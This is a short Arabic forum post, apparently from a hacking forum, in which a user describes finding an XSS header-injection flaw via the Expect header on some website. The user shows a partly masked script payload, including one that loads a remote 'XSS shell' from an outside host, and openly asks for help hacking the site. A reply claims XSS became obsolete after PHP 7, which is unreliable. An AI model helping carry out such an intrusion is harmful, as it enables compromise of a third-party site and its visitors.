عدد النقاط : 10
مرحبا اعزائي وجدت ثغرة XSS headers Injection باستخدام tamper data استطيع اضافه Expect وبعدها ممكن اكتب اي كود مثلا ***************("Hello")</script> ويظهر لي hello بس المشكله لما حاولت ارفع شل XSS ما رضى يصير عن طريق الكود ********** src="http://mysite.com/xssshell/xssshell.asp" </script> ممكن احد يساعدني في اختراق هذا الموقع ؟؟ المصدر: :: vBspiders Professional Network ::XSS headers injection
XSS headers injection
يمكن حماية من سرفر الموقع ال xss صار من التاريخ بعد تحديث ال php لل 7